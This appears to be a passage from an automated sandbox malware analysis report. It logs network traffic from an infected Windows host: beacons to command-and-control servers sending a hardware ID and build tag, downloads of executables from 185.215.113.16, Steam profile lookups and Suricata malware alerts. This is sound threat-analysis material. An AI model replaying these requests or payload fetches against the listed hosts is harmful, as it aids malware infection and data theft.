Ascii: ------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="hwid"739A55EA39BD3120641781------HCBFIJJECFIEBGDGCFIJContent-Disposition: form-data; name="build"doma------HCBFIJJECFIEBGDGCFIJ--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 39 37 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000979001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJECGCBGDBKJJKEBFBFHHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 39 41 35 35 45 41 33 39 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 43 42 47 44 42 4b 4a 4a 4b 45 42 46 42 46 48 2d 2d 0d 0a Data Ascii: ------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="hwid"739A55EA39BD3120641781------JJECGCBGDBKJJKEBFBFHContent-Disposition: form-data; name="build"doma------JJECGCBGDBKJJKEBFBFH--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJEBFHDBGIECBFCBKJHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 39 41 35 35 45 41 33 39 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 45 42 46 48 44 42 47 49 45 43 42 46 43 42 4b 4a 2d 2d 0d 0a Data Ascii: ------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="hwid"739A55EA39BD3120641781------IJJJEBFHDBGIECBFCBKJContent-Disposition: form-data; name="build"doma------IJJJEBFHDBGIECBFCBKJ--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCFCBAKKFBFIECAEBAEHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 39 41 35 35 45 41 33 39 42 44 33 31 32 30 36 34 31 37 38 31 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 45 2d 2d 0d 0a Data Ascii: ------CGCFCBAKKFBFIECAEBAEContent-Disposition: form-data; name="hwid"739A55EA39BD3120641781------CGCFCBAKKFBFIECAEBAEContent-Disposition: form-data; name="build"doma------CGCFCBAKKFBFIECAEBAE--
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49967 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49713 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49990 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49992 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49996 -> 185.215.113.16:80
Source: Network traffic Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49996 -> 185.215.113.16:80
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00FEBE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 8_2_00FEBE30
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /test/num.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
